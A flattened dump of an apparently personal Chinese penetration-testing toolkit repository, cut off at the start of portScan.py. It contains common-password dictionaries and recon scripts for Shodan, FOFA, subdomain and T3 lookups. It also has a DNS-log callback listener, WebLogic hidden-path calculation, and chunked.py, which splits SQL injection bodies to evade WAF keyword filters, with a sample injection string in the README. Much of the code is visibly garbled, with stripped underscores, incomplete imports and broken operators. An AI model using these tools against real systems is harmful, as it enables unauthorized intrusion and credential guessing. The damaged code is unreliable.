(.*?)

├── .gitignore ├── passdict ├── dict │ ├── and.dict │ ├── pre.dict │ ├── ext.dict │ └── password.dict ├── README.md └── pass.py ├── nmap_oG.py ├── dirScan ├── README.md └── dirScan.py ├── f5_CookieDecode.py ├── favicon_mmh3.py ├── mssqlC2H.py ├── domain2ip.py ├── ip138.py ├── fofa.py ├── ips2ipc.py ├── dnslog.py ├── chunked.py ├── shodan.py ├── tftp.py ├── objectSid2SID.py ├── weblogic_hash.py ├── npmSearch.py ├── getKeyword.py ├── README.md ├── t3scan.py ├── portScan.py ├── scanTitle.py ├── ip2domains.py ├── brute.py ├── redisWriteFile.py ├── aliyunECS.py ├── dnsbrute.py ├── bigData.py ├── iis_shortname_Scan.py ├── sub.py ├── simple_http.py2 ├── socks5.py2 └── cms.rb /.gitignore: -------------------------------------------------------------------------------- 1 | config.py 2 | -------------------------------------------------------------------------------- /passdict/dict/and.dict: -------------------------------------------------------------------------------- 1 | @ 2 | 3 | _ 4 | - 5 | . 6 | ! 7 | % 8 | # -------------------------------------------------------------------------------- /passdict/dict/pre.dict: -------------------------------------------------------------------------------- 1 | 1 2 | 3 | Aa 4 | a 5 | woai 6 | woshi 7 | ai 8 | aa 9 | Q 10 | q 11 | ws 12 | wo 13 | z 14 | yy -------------------------------------------------------------------------------- /passdict/README.md: -------------------------------------------------------------------------------- 1 | --keyword 指定字符串
2 | --pass 将dict/password.dict中的字典加入返回
3 | --file path 将字典写入path
4 | --print 直接输出
5 | Eg:pass.py --keyword admin --print
6 | Eg:pass.py --keyword admin --file ./test.dict 7 | -------------------------------------------------------------------------------- /nmap_oG.py: -------------------------------------------------------------------------------- 1 | import re 2 | import sys 3 | nmap_log = open(sys.argv[1]).readlines() 4 | ip_re = r"([0-9]{1,3}\.){3}[0-9]{1,3}" 5 | port_re = r"([0-9]{2,5})\/open" 6 | for log in nmap_log: 7 | ip= re.compile(ip_re).search(log) 8 | ports=re.compile(port_re).findall(log) 9 | if ip and ports: 10 | for p in ports: 11 | print("%s:%s"%(ip.group(),p)) 12 | -------------------------------------------------------------------------------- /dirScan/README.md: -------------------------------------------------------------------------------- 1 | 17-12-05 2 | 更新目录和文件是判断方法 3 | 增加备份文件扫描(根据目录生成) 4 | 5 | 计划: 6 | 增加代码泄露扫描 7 | 增加waf检测 8 | 9 | 说明： 10 | 下载了源码之家php asp .net 共2000套源码，分析出目录字典url_keyword.dict和文件字典file_keyword.dict
11 | dirScan.py功能：
12 | 检测404跳转与网络不可达
13 | 支持http代理
14 | 支持自定义HEADERS
15 | 支持多线程
16 | 支持扫描目录深度设定
17 | 可自定义是否扫描文件或目录
18 | 可自定义文件后缀
19 | 可自定义字典文件
20 | 21 | -------------------------------------------------------------------------------- /f5_CookieDecode.py: -------------------------------------------------------------------------------- 1 | import re 2 | import sys 3 | 4 | if __name__ == "__main__": 5 | cookie = sys.argv[1] 6 | __tmp = cookie.split(".") 7 | Iip = __tmp[0] 8 | Iport = __tmp[1] 9 | Hip = hex(int(Iip))[2:] 10 | Hport = hex(int(Iport))[2:] 11 | Cport = "".join([str(i) for i in re.findall(r"\w{2}",Hport)][::-1]) 12 | ip = ".".join([str(int(i,16)) for i in re.findall(r"\w{2}",Hip)]) 13 | port = str(int(Cport,16)) 14 | print("%s:%s" % (ip,port)) 15 | 16 | -------------------------------------------------------------------------------- /favicon_mmh3.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import mmh3 3 | import sys 4 | import base64 5 | url = sys.argv[1] 6 | if not url.endswith("favicon.ico"): 7 | if url.endswith("/"): 8 | url = url + "favicon.ico" 9 | else: 10 | url = url + "/favicon.ico" 11 | req = requests.get(url=url,timeout=10,verify=False) 12 | print("http.favicon.hash:%s"%(mmh3.hash(base64.encodebytes(req.content).decode()))) 13 | print("icon_hash=\"%s\""%(mmh3.hash(base64.encodebytes(req.content).decode()))) 14 | -------------------------------------------------------------------------------- /mssqlC2H.py: -------------------------------------------------------------------------------- 1 | import sys 2 | def low2high(d): 3 | # 高低位转换 4 | d = ord(d) 5 | return hex(d & 0xff).lstrip('0x') + hex(d >> 8).lstrip('0x') 6 | 7 | def toHex(s): 8 | sHex = "0x" 9 | for i in s: 10 | if ord(i) < 255: 11 | sHex = sHex + hex(ord(i)).lstrip('0x') + '00' 12 | else: 13 | sHex = sHex + low2high(i) 14 | return sHex 15 | 16 | 17 | if __name__ == '__main__': 18 | data = sys.argv[1] 19 | print(toHex(data)) 20 | 21 | -------------------------------------------------------------------------------- /passdict/dict/ext.dict: -------------------------------------------------------------------------------- 1 | 1 2 | 3 | 520 4 | 123 5 | 666 6 | 888 7 | wsx 8 | 345 9 | 1234 10 | 12345 11 | 123456 12 | 2021 13 | 2020 14 | 2019 15 | 2018 16 | 2017 17 | 2016 18 | 2015 19 | 2014 20 | 2013 21 | 2012 22 | 2011 23 | 2010 24 | 2009 25 | 2008 26 | 2007 27 | 2006 28 | 2005 29 | 2004 30 | 2003 31 | 2002 32 | 2001 33 | 2000 34 | 1999 35 | 1998 36 | 1997 37 | 1996 38 | 1995 39 | 1994 40 | 1993 41 | 1992 42 | 1991 43 | 1989 44 | 1988 45 | 1987 46 | 1986 47 | 1985 48 | 123.. 49 | !@#$%^&* 50 | !@#$%^ 51 | !@#$% 52 | !@#$ 53 | !@# 54 | 1qaz 55 | 2wsx 56 | 3edc 57 | qwe 58 | asd 59 | zxc 60 | qazwsx 61 | qwert 62 | asdfg 63 | zxcvb 64 | -------------------------------------------------------------------------------- /domain2ip.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | import time 4 | def domain2ip(domains): 5 | for domain in domains: 6 | domain = domain.strip() 7 | try: 8 | ip = socket.gethostbyname(domain) 9 | except: 10 | ip = '127.0.0.1' 11 | print(ip,domain) 12 | 13 | 14 | 15 | if __name__ == '__main__': 16 | if sys.argv[1] == '--stdin': 17 | domains = sys.stdin.read().split("\n") 18 | domain2ip(domains) 19 | 20 | 21 | else: 22 | domain_file = sys.argv[1] 23 | domains = open(domain_file,'r').readlines() 24 | domain2ip(domains) 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /ip138.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | 5 | def ip138(url): 6 | re_ip = re.search(r"([0-9]{1,3}\.){3}[0-9]{1,3}",url) 7 | if re_ip: 8 | target = re_ip.group() 9 | api = "http://site.ip138.com/%s/" % target 10 | else: 11 | target = url 12 | api = "http://site.ip138.com/%s/domain.htm" % target 13 | try: 14 | req = requests.get(api,timeout=10) 15 | html = req.text 16 | except Exceptions as e: 17 | html = '' 18 | print(e) 19 | if re_ip: 20 | re_domains = re.findall(r"(.*?)

",html) 24 | returnlist = re_subdomains 25 | return returnlist 26 | if __name__ == '__main__': 27 | print(ip138(sys.argv[1])) 28 | 29 | 30 | -------------------------------------------------------------------------------- /fofa.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import base64 4 | import config 5 | import sys 6 | email = config.fofa_email 7 | key = config.fofa_key 8 | 9 | def search(keyword,fields="ip,port,host,title"): 10 | b64_keyword = base64.b64encode(keyword.encode()).decode() 11 | proxies={"https":"127.0.0.1:7890"} 12 | url = "https://fofa.info/api/v1/search/all?email=%s&key=%s&qbase64=%s&size=10000&fields=%s" % (email,key,b64_keyword,fields) 13 | out = {} 14 | try: 15 | req = requests.get(url=url,timeout=60,proxies=proxies) 16 | out = json.loads(req.text) 17 | results = out 18 | if len(results) > 0 : 19 | for result in results['results']: 20 | print("%s%s %s" % ((result[0]+":"+result[1]).ljust(21),result[2],result[3])) 21 | except Exception as e: 22 | print(e) 23 | if __name__ == "__main__": 24 | search(sys.argv[1]) 25 | -------------------------------------------------------------------------------- /ips2ipc.py: -------------------------------------------------------------------------------- 1 | 2 | def ips2ipc(filename): 3 | minip={} 4 | maxip={} 5 | ips = open(filename).readlines() 6 | for ip in ips: 7 | minip_keys = minip.keys() 8 | maxip_keys = maxip.keys() 9 | ip_k = ".".join(ip.strip().split('.')[:3]) 10 | ip_v = ip.strip().split('.')[-1] 11 | if ip_k not in maxip_keys and ip_k not in minip_keys: 12 | maxip[ip_k] = ip_v 13 | minip[ip_k] = ip_v 14 | elif int(ip_v) > int(maxip[ip_k]): 15 | maxip[ip_k]=int(ip_v) 16 | elif int(ip_v) < int(minip[ip_k]): 17 | minip[ip_k] = int(ip_v) 18 | for k in maxip.keys(): 19 | if int(maxip[k]) == int(minip[k]): 20 | print("%s.%s"%(k,maxip[k])) 21 | else: 22 | print("%s.%s-%s"%(k,minip[k],maxip[k])) 23 | if '__main__' == __name__: 24 | import sys 25 | if len(sys.argv) != 2: 26 | exit("%s %s" % (sys.argv[0],"/tmp/ip #文件路径")) 27 | ips2ipc(sys.argv[1]) -------------------------------------------------------------------------------- /dnslog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | from dnslib import DNSRecord 4 | 5 | if __name__ == '__main__': 6 | print('DNS Server Ready') 7 | 8 | udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 9 | udps.bind(('0.0.0.0', 53)) 10 | 11 | try: 12 | while True: 13 | try: 14 | packet, addr = udps.recvfrom(1024) 15 | except ConnectionResetError: 16 | continue # closed by client 17 | client = addr 18 | try: 19 | client = socket.gethostbyaddr(addr[0]) 20 | except: 21 | pass 22 | d = DNSRecord.parse(packet) 23 | found = str(d.q.qname) + ' from ' + str(client[0]) 24 | print found 25 | #fd = open('dnslog', 'a+') 26 | #fd.write(found+'\n') 27 | #fd.close() 28 | except KeyboardInterrupt: 29 | pass 30 | finally: 31 | udps.close() 32 | input('Press enter...') 33 | -------------------------------------------------------------------------------- /chunked.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | import sys 4 | def randomIP(): 5 | numbers = [] 6 | while not numbers or numbers[0] in (10, 172, 192): 7 | numbers = sample(xrange(1, 255), 4) 8 | return '.'.join(str(_) for _ in numbers) 9 | 10 | def chunk_data(data): 11 | keywords = ['and', 'union', 'select', 'user', 'from'] 12 | dl = len(data) 13 | ret = "" 14 | index = 0 15 | while index < dl: 16 | chunk_size = random.randint(1, 9) 17 | if index + chunk_size >= dl: 18 | chunk_size = dl - index 19 | salt = ''.join(random.sample(string.ascii_letters + string.digits, 5)) 20 | while 1: 21 | tmp_chunk = data[index:index + chunk_size] 22 | tmp_bool = True 23 | for k in keywords: 24 | if k in tmp_chunk: 25 | chunk_size -= 1 26 | tmp_bool = False 27 | break 28 | if tmp_bool: 29 | break 30 | index += chunk_size 31 | ret += "{0};{1}\r\n".format(hex(chunk_size)[2:], salt) 32 | ret += "{0}\r\n".format(tmp_chunk) 33 | 34 | ret += "0\r\n\r\n" 35 | print(ret) 36 | print("Content-Type: application/x-www-form-urlencoded; charset=utf-8") 37 | print("Transfer-Encoding: Chunked") 38 | print() 39 | chunk_data(sys.argv[1]) 40 | -------------------------------------------------------------------------------- /passdict/dict/password.dict: -------------------------------------------------------------------------------- 1 | Aa111111 2 | Aa123456s 3 | 123456 4 | a123456 5 | 123456a 6 | 5201314 7 | 111111 8 | woaini1314 9 | 123123 10 | 000000 11 | 1qaz2wsx 12 | 1q2w3e4r 13 | qwe123 14 | 7758521 15 | 123qwe 16 | a123123 17 | 123456aa 18 | woaini520 19 | woaini 20 | 100200 21 | 1314520 22 | woaini123 23 | 123321 24 | q123456 25 | 123456789 26 | 123456789a 27 | 5211314 28 | asd123 29 | a123456789 30 | z123456 31 | asd123456 32 | a5201314 33 | aa123456 34 | zhang123 35 | aptx4869 36 | 123123a 37 | 1q2w3e4r5t 38 | 1qazxsw2 39 | 5201314a 40 | 1q2w3e 41 | aini1314 42 | 31415926 43 | q1w2e3r4 44 | 123456qq 45 | woaini521 46 | 1234qwer 47 | a111111 48 | 520520 49 | iloveyou 50 | abc123 51 | 110110 52 | 111111a 53 | 123456abc 54 | w123456 55 | 7758258 56 | 123qweasd 57 | 159753 58 | qwer1234 59 | a000000 60 | qq123123 61 | zxc123 62 | 123654 63 | abc123456 64 | 123456q 65 | qq5201314 66 | 12345678 67 | 000000a 68 | 456852 69 | as123456 70 | 1314521 71 | 112233 72 | 521521 73 | qazwsx123 74 | zxc123456 75 | abcd1234 76 | asdasd 77 | 666666 78 | love1314 79 | QAZ123 80 | aaa123 81 | q1w2e3 82 | aaaaaa 83 | a123321 84 | 123000 85 | 11111111 86 | 12qwaszx 87 | 5845201314 88 | s123456 89 | nihao123 90 | caonima123 91 | zxcvbnm123 92 | wang123 93 | 159357 94 | 1A2B3C4D 95 | asdasd123 96 | 584520 97 | 753951 98 | 147258 99 | 1123581321 100 | 110120 -------------------------------------------------------------------------------- /shodan.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import time 4 | import IPy 5 | import sys 6 | class shodan: 7 | def __init__(self): 8 | self.url = "https://www.shodan.io/host/" 9 | 10 | def _get_html(self,url): 11 | try: 12 | req = requests.get(url,timeout=10) 13 | code = req.status_code 14 | except Exception as e: 15 | print("Err:%s" % e) 16 | code = 404 17 | if code == 200: 18 | html = req.text 19 | else: 20 | html = '' 21 | return html.strip() 22 | 23 | def get_port(self,ip): 24 | html = self._get_html(self.url+str(ip)) 25 | li_list = re.findall(r"

(.*?)<\/li>",html,re.S) 26 | for li in li_list: 27 | re_port = re.search(r"

(.*?)<\/div>",li) 28 | re_protocol = re.search(r"

(.*?)<\/div>",li) 29 | re_state = re.search(r"

(.*?)<\/div>",li) 30 | re_server = re.search(r"

(.?)<\/small><\/h3>",li) 31 | port = re_port.group(1) if re_port else '' 32 | state = re_state.group(1) if re_state else '' 33 | server = re_server.group(1).replace(""," ") if re_server else '' 34 | print(ip,port,state,server) 35 | s=shodan() 36 | ips = IPy.IP(sys.argv[1]) 37 | for ip in ips: 38 | print(ip) 39 | s.get_port(ip) 40 | 41 | -------------------------------------------------------------------------------- /tftp.py: -------------------------------------------------------------------------------- 1 | 2 | import sys 3 | import struct 4 | from socket import 5 | g_server_ip = '' 6 | g_downloadFileName = '' 7 | def run_test(): 8 | global g_server_ip 9 | global g_downloadFileName 10 | g_server_ip = sys.argv[1] 11 | g_downloadFileName = sys.argv[2] 12 | def main(): 13 | run_test() 14 | sendDataFirst = struct.pack('!H%dsb5sb'%len(g_downloadFileName), 1, g_downloadFileName.encode('gb2312'), 0, 'octet'.encode('gb2312'), 0) 15 | s = socket(AF_INET, SOCK_DGRAM) 16 | s.sendto(sendDataFirst, (g_server_ip, 69)) 17 | downloadFlag = True 18 | fileNum = 0 19 | f = open(g_downloadFileName, 'wb') 20 | while True: 21 | responseData = s.recvfrom(1024) 22 | recvData, serverInfo = responseData 23 | packetOpt = struct.unpack("!H", recvData[:2]) 24 | packetNum = struct.unpack("!H", recvData[2:4]) 25 | if packetOpt[0] == 3: 26 | 27 | fileNum += 1 28 | 29 | if fileNum == 65536: 30 | fileNum = 0 31 | 32 | if fileNum == packetNum[0]: 33 | f.write(recvData[4:]) 34 | fileNum = packetNum[0] 35 | ackData = struct.pack("!HH", 4, packetNum[0]) 36 | s.sendto(ackData, serverInfo) 37 | 38 | elif packetOpt[0] == 5: 39 | 40 | downloadFlag = False 41 | break 42 | else: 43 | 44 | break 45 | 46 | if len(recvData) < 516: 47 | downloadFlag = True 48 | 49 | break 50 | if downloadFlag == True: 51 | f.close() 52 | else: 53 | os.unlink(g_downloadFileName) 54 | 55 | if name == 'main': 56 | main() 57 | -------------------------------------------------------------------------------- /objectSid2SID.py: -------------------------------------------------------------------------------- 1 | from binascii import b2a_hex 2 | import sys 3 | import base64 4 | 5 | def sid_to_str(sid): 6 | try: 7 | # Python 3 8 | if str is not bytes: 9 | # revision 10 | revision = int(sid[0]) 11 | # count of sub authorities 12 | sub_authorities = int(sid[1]) 13 | # big endian 14 | identifier_authority = int.from_bytes(sid[2:8], byteorder='big') 15 | # If true then it is represented in hex 16 | if identifier_authority >= 2 ** 32: 17 | identifier_authority = hex(identifier_authority) 18 | 19 | # loop over the count of small endians 20 | sub_authority = '-' + '-'.join([str(int.from_bytes(sid[8 + (i * 4): 12 + (i * 4)], byteorder='little')) for i in range(sub_authorities)]) 21 | # Python 2 22 | else: 23 | revision = int(b2a_hex(sid[0])) 24 | sub_authorities = int(b2a_hex(sid[1])) 25 | identifier_authority = int(b2a_hex(sid[2:8]), 16) 26 | if identifier_authority >= 2 ** 32: 27 | identifier_authority = hex(identifier_authority) 28 | 29 | sub_authority = '-' + '-'.join([str(int(b2a_hex(sid[11 + (i * 4): 7 + (i * 4): -1]), 16)) for i in range(sub_authorities)]) 30 | objectSid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority 31 | 32 | return objectSid 33 | except Exception: 34 | pass 35 | return sid 36 | #decode objectSid and AllowedToActOnBehalfOfOtherIdentity in ldapsearch result 37 | sid = base64.b64decode(sys.argv[1])[-28:] 38 | print(sid_to_str(sid)) 39 | -------------------------------------------------------------------------------- /weblogic_hash.py: -------------------------------------------------------------------------------- 1 | import sys 2 | def convert_n_bytes(n, b): 3 | bits = b * 8 4 | return (n + 2 (bits - 1)) % 2 bits - 2 ** (bits - 1) 5 | 6 | def convert_4_bytes(n): 7 | return convert_n_bytes(n, 4) 8 | 9 | def getHashCode(s): 10 | h = 0 11 | n = len(s) 12 | for i, c in enumerate(s): 13 | h = h + ord(c) * 31 ** (n - 1 - i) 14 | return convert_4_bytes(h) 15 | 16 | def toString(strs,radix): 17 | i = int(strs) 18 | digits = [ 19 | '0' , '1' , '2' , '3' , '4' , '5' , 20 | '6' , '7' , '8' , '9' , 'a' , 'b' , 21 | 'c' , 'd' , 'e' , 'f' , 'g' , 'h' , 22 | 'i' , 'j' , 'k' , 'l' , 'm' , 'n' , 23 | 'o' , 'p' , 'q' , 'r' , 's' , 't' , 24 | 'u' , 'v' , 'w' , 'x' , 'y' , 'z' 25 | ] 26 | buf = list(range(65)) 27 | charPos = 64 28 | negative = int(strs) < 0 29 | if not negative: 30 | i = -int(strs) 31 | 32 | while (i<=-radix): 33 | buf[int(charPos)] = digits[int(-(i%radix))] 34 | charPos = charPos - 1 35 | i = int(i / radix) 36 | buf[charPos] = digits[int(-i)] 37 | if negative: 38 | charPos = charPos - 1 39 | buf[charPos] = '-' 40 | return (buf[charPos:charPos+65-charPos]) 41 | def get_path(serverName,appName="bea_wls_internal",packName="bea_wls_internal.war"): 42 | strings = "%s_%s_%s" % (serverName,appName,packName) 43 | print("".join(toString(getHashCode(strings),36)).replace("-","")) 44 | if len(sys.argv) == 2: 45 | get_path(sys.argv[1]) 46 | elif len(sys.argv) == 4: 47 | args = sys.argv[1:] 48 | get_path(args) 49 | else: 50 | print("%s AdminServer" % file) 51 | print("%s AdminServer bea_wls_internal bea_wls_internal.war" % file) 52 | -------------------------------------------------------------------------------- /npmSearch.py: -------------------------------------------------------------------------------- 1 | import aiohttp 2 | from aiofile import async_open 3 | import json 4 | import asyncio 5 | import sys 6 | npmSearchApi = "https://npmmirror.com/package/{keyword}" 7 | async def checkPackage(keyword): 8 | url = npmSearchApi.format(keyword=keyword) 9 | async with aiohttp.ClientSession() as session: 10 | async with session.get(url=url) as req: 11 | status_code = req.status 12 | if status_code != 200: 13 | print(keyword,"不存在") 14 | 15 | async def getPackageByUrl(url): 16 | async with aiohttp.ClientSession() as session: 17 | async with session.get(url) as req: 18 | if req.status ==200: 19 | return json.loads(await req.text()) 20 | return False 21 | 22 | async def getPackageByFile(filepath): 23 | async with async_open(filepath,"r") as fhand: 24 | text = await fhand.read() 25 | return json.loads(text) 26 | 27 | async def asyncList(slist): 28 | tmpArray = [] 29 | listSize = len(slist) 30 | listIndex = 0 31 | for k,v in slist.items(): 32 | tmpArray.append(k) 33 | while True: 34 | if listIndex > listSize - 1: 35 | break 36 | yield tmpArray[listIndex] 37 | listIndex = listIndex + 1 38 | 39 | 40 | def printHelp(): 41 | print(sys.argv[0] + " --url https://github.com/github/package.json") 42 | print(sys.argv[0] + " --file ./package.json") 43 | 44 | async def main(): 45 | #async with aiohttp.ClientSession() as session: 46 | if "--url" in sys.argv: 47 | packageJson = await getPackageByUrl(sys.argv[2]) 48 | elif "--file" in sys.argv: 49 | packageJson = await getPackageByFile(sys.argv[2]) 50 | else: 51 | printHelp() 52 | exit() 53 | packageList = {} 54 | packageList.update(packageJson.get("dependencies",{})) 55 | packageList.update(packageJson.get("devDependencies",{})) 56 | if len(packageList) == 0: 57 | exit() 58 | print(packageJson.get("repository",{}).get("url","")) 59 | async for p in asyncList(packageJson): 60 | await checkPackage(p) 61 | 62 | 63 | if name == "main__": 64 | loop = asyncio.get_event_loop() 65 | loop.run_until_complete(main()) 66 | 67 | 68 | -------------------------------------------------------------------------------- /getKeyword.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | import jieba 5 | import jieba.posseg as pseg 6 | from pypinyin import slug, lazy_pinyin 7 | import tldextract 8 | class getKeyword: 9 | def get_html(self,url): 10 | url = url if '://' in url else 'http://'+url 11 | try: 12 | headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8',} 14 | re = requests.get(url,headers=headers,timeout=10) 15 | re.encoding = 'utf-8' 16 | return re.text.lower() 17 | except Exception as e: 18 | print(e) 19 | return '' 20 | 21 | def __re_list(self): 22 | """可以直接在这个re_list加关键字的正则""" 23 | re_list=[ 24 | re.compile(r"[a-z]{2,12}",re.S), #2到12位的字母 25 | re.compile(r"[0-9]{4}|[0-9]{8}|[0-9]{11}",re.S), #4位数字2018,8位数字座机号,11位数字手机号 26 | re.compile(r"[0-9a-z]{4,8}",re.S), #混合型,会造成较多的数据，不想使用可以注释此行 27 | ] 28 | return re_list 29 | 30 | def __split_domain(self,url): 31 | """分割域名""" 32 | domain = url if '://' not in url.split('/')[0] else url.split('/')[2] 33 | tld = tldextract.extract(domain) 34 | sub = tld.subdomain 35 | domain = tld.domain 36 | return [sub,domain] 37 | 38 | def __jieba_html(self,html): 39 | """jieba分词""" 40 | keys = [] 41 | words = pseg.cut(html) 42 | for word,flag in words: 43 | if flag in ['ns','n','nt','nz']: # 中文分词的词性类别参考https://www.cnblogs.com/adienhsuan/p/5674033.html 44 | keys.append(slug(word,separator='')) 45 | return keys 46 | 47 | def re_html(self,html): 48 | if html: 49 | keys = [] 50 | tag_=re.findall(r"=\"(.?)\"",html) #标签属性,可以过滤掉html标签 51 | content_=re.findall(r">(.?)<",html) #文本内容 52 | text = ' '.join(tag_+content_) 53 | for r in self.__re_list(): 54 | keys = r.findall(text) + keys 55 | jieba_keys = self.__jieba_html(text) 56 | return list(set(keys+jieba_keys)) 57 | def get_keywords(self,url): 58 | return self.__split_domain(url)+self.re_html(self.get_html(url)) 59 | 60 | if name == 'main': 61 | p = getKeyword() 62 | print(p.get_keywords(sys.argv[1])) 63 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # tools 2 | 自己写的PYTHON小工具集(渗透测试工具集) 3 | scanTitle.py 批量获取域名标题 scanTitle.py urls.txt 10 (线程) 4 | shodan.py 用shadan接口查询ip开放端口，shodan.py 127.0.0.1 支持C段shodan.py 127.0.0.0/24 5 | getKeyword.py 获取网页内容，生成关键字，和passdict项目可以一起用，生成密码字典；需要pypinyin,jieba,tldextract库 6 | dns.py copy以前乌云的代码。加一个A记录xxxx.domain.com指向服务器ip,再加一个ns记录dnslog.domain.com,指向xxxx.domain.com。test.dnslog.domain.com 7 | domain2ip.py 使用socket.gethostbyname 查询域名对应ip。domain2ip.py domains.dict 8 | portScan.py 如果目标是windows且将所有未开放的端口全转发到一个端口上，NMAP将显示说有端口开放。portScan.py -t 127.0.0.1-100 -p 80,8000-10000 -n 100 9 | ip2domains.py 使用virustotal.com的查询接口，实现ip反查域名，子域名查询。效果不错 10 | t3scan.py T3协议扫描，建议使用64位python 11 | nmap_oG.py 对nmap -oG 的输出进行格式化127.0.0.1:80 12 | weblogic_hash.py weblogic 6位随机路径名计算 13 | chunked.py 复制t00ls w8ayy写的分块传输脚本。chunked.py "id=1' and 1=1 and ''='" 14 | ips2ipc.py ips2ipc.py /tmp/ip 把文件/tmp/ip内的独立IP转换成ip段,127.0.0.1;127.0.0.100 转换成127.0.0.1-100 15 | brute.py 爆破工具，暂时只支持ssh 16 | sub.py 多个接口查询子域名 17 | iis_shortname_Scan.py 复制lijiejie的iis短文件名漏洞利用工具 18 | tftp.py python 实现tftp下载工具，UDP协议 19 | aliyunECS.py aliyun ECS命令执行并回显,需要先用pip安装aliyun sdk 20 | fofa.py 简单的fofa搜索工具,需要配置key 21 | redisWriteFile.py redis写文件工具,支持python2,python3 会有点bug 22 | mssqlC2H.py mssql写文件时有中文路径，hex编码错误 23 | socks5.py2 python2下无需三方库实现socks5代理，来原互联网 24 | simple_http.py2 python2下无需三方库现实web服务与上传simple_http.py2 25 | cms.rb whatweb CMS指纹，放到plugins目录下 26 | f5_CookieDecode.py f5 cookie解码为ip:port,python3 f5_CookieDecode.py 1677787402.36895.0000 27 | npmSearch.py 通过package.json,搜索不有注册的包,支持url或本地文件 28 | bigData.py 多个资产发现接口，查数据 29 | objectSid2SID.py 取巧获取ldapsearch结果中objectSid和AllowedToActOnBehalfOfOtherIdentity包含的sid; python3 objectSid2SID.py [objectSid Base64 String] 30 | /dirScan 目录扫描项目 31 | /passdict 根据关键字生成密码 32 | 33 | --- 34 | ## 一些使用技巧 35 | 查找cname解析 36 | `python3 sub.py baidu.com --sub|`[dnsprobe ](https://github.com/projectdiscovery/dnsprobe)` -r cname` 37 | * 查询子域名信息 38 | ```bash 39 | python3 sub.py baidu.com 40 | python3 sub.py baidu.com --sub > baidu.com.sub 41 | ``` 42 | * 扫描Title 43 | ```bash 44 | python3 scanTitle.py baidu.com.sub 45 | ``` 46 | * 子域名转IP 47 | ```bash 48 | python3 domain2ip.py baidu.com.sub 49 | 提取IP正则 50 | ([0-9]{1,3}\.){3}[0-9]{1,3} 51 | ``` 52 | * 单一的IP转成IP段 53 | ```bash 54 | python3 ips2ipc.py baidu.com.ips > baidu.com.ipc 55 | 192.168.1.1 56 | 192.168.1.9 57 | 转成192.168.1-9 58 | ``` 59 | * nmap -oG 扫描结果转换 60 | ```bash 61 | nmap -n -T4 --open -iL baidu.com.ipc -oG baidu.com.nmap 62 | python3 nmap_oG.py baidu.com.nmap 63 | ``` 64 | 65 | ## 缺失的config.py 66 | ```python 67 | #https://www.virustotal.com 免费注册获取api key 68 | vt_key="9" 69 | 70 | #https://securitytrails.com/ 免费注册获取api key 71 | sec_keys = ["9"] 72 | 73 | #https://fofa.so/ 注册获取api key 74 | fofa_email="9@qq.com" 75 | fofa_key="9**" 76 | ``` 77 | -------------------------------------------------------------------------------- /t3scan.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import re 3 | import os 4 | import sys 5 | import socket 6 | 7 | 8 | class t3scan: 9 | def init(self, snum=50): 10 | self.t3str = "t3 12.1.2\nAS:2048\nHL:19\n\n" 11 | self.snum = int(snum) 12 | if os.name == 'nt': 13 | self.loop = asyncio.ProactorEventLoop() # for subprocess' pipes on Windows 14 | asyncio.set_event_loop(self.loop) 15 | else: 16 | self.loop = asyncio.get_event_loop() 17 | 18 | async def __send_t3(self, ip, port): 19 | sem = asyncio.Semaphore(self.snum) 20 | async with sem: 21 | connect = asyncio.open_connection(ip, port) 22 | try: 23 | r, w = await asyncio.wait_for(connect, 3) 24 | except: 25 | return "" 26 | w.write(self.t3str.encode()) 27 | await w.drain() 28 | try: 29 | line = await asyncio.wait_for(r.readline(), 3) 30 | except: 31 | w.close() 32 | return "" 33 | w.close() 34 | if line: 35 | r = re.search( 36 | r"^(HELO:|LGIN:|SERV:|UNAV:|LICN:|RESC:|VERS:|CATA:|CMND:)((\d{1,2}\.\d{1,2}\.\d{1,2})|)", line.decode()) 37 | if r: 38 | print("%s:%s 存在T3协议 %s" % (ip,port,r.group(2))) 39 | 40 | def fileScan(self, path, sp=None): 41 | tasks = [] 42 | if os.path.isfile(path): 43 | lines = open(path, 'r').readlines() 44 | for line in lines: 45 | line = line.strip().split(sp) 46 | ip = line[0].strip() 47 | port = line[-1].strip() 48 | tasks.append(self.__send_t3(ip, port)) 49 | self.loop.run_until_complete(asyncio.wait(tasks)) 50 | self.loop.close() 51 | else: 52 | print("文件%s 不存在" % path) 53 | 54 | def scan(self, ip, port): 55 | self.loop.run_until_complete(self.__send_t3(ip, port)) 56 | self.loop.close() 57 | 58 | 59 | def get_argv(alist, astr): 60 | if astr in alist: 61 | try: 62 | return alist[alist.index(astr)+1] 63 | except: 64 | print("%s 参数错误" % astr) 65 | return False 66 | else: 67 | return False 68 | 69 | 70 | def in_argv(alist, astr): 71 | if astr in alist: 72 | return True 73 | else: 74 | return False 75 | 76 | 77 | if name == 'main': 78 | alist = sys.argv 79 | snum = 10 if not in_argv(alist, '-t') else get_argv(alist, '-t') 80 | filepath = None if not in_argv(alist, '-f') else get_argv(alist, '-f') 81 | split = None if not in_argv(alist, '-p') else get_argv(alist, '-p') 82 | t3 = t3scan(snum) 83 | if filepath: 84 | t3.fileScan(filepath, split) 85 | elif not split and not filepath and len(alist) == 3: 86 | t3.scan(sys.argv[1], sys.argv[2]) 87 | else: 88 | print("-t 指定并发数,默认10") 89 | print("-f 指定读取文件") 90 | print("-p 指定ip&port分割符，如果是空格分割不用此参数") 91 | print("%s 127.0.0.1 7001 单目标检测" % alist[0]) 92 | exit() 93 | -------------------------------------------------------------------------------- /portScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import socket 3 | import threading 4 | import time 5 | 